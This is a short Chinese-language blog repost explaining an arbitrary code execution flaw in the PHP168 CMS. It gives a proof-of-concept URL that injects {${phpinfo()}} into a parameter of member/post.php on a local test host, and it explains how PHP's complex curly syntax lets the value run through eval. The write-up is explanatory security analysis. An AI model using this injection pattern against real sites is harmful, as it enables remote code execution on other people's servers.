php 168任意代码执行漏洞之php的Complex (curly) syntax
生活随笔
收集整理的這篇文章主要介紹了
php 168任意代码执行漏洞之php的Complex (curly) syntax
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
今天了解了php 168的任意代碼執行漏洞,Poc:
http://192.168.6.128/pentest/cms/php168/member/post.php
?only=1
&showHtml_Type[bencandy][1]={${phpinfo()}}
&aid=1
&job=endHTML
通過代碼審計得知,最后會執行
eval("\$array[showurl]=\"$filename_b\";");而$filename_b最終值為**{${phpinfo()}}**
關于{${}}這種形式涉及到了php Complex (curly) syntax,
通過上圖得知,
eval("\$array[showurl]=\"$filename_b\";");實際上就是執行了phpinfo();
不理解的童鞋,可以去
https://www.php.net/manual/zh/language.types.string.php自行查閱,
另外,除了字符串之外,{${}}還有別的用法,可以創建一個新的變量,
https://stackoverflow.com/questions/14238120/purpose-of-complex-curly-syntax-outside-a-string-representation
歡迎評論區指導與批評。
轉載于:https://www.cnblogs.com/danku/p/10778306.html
總結
以上是生活随笔為你收集整理的php 168任意代码执行漏洞之php的Complex (curly) syntax的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: phoenixawardbios怎么开机
- 下一篇: win8.1怎么关虚拟内存 Win 8.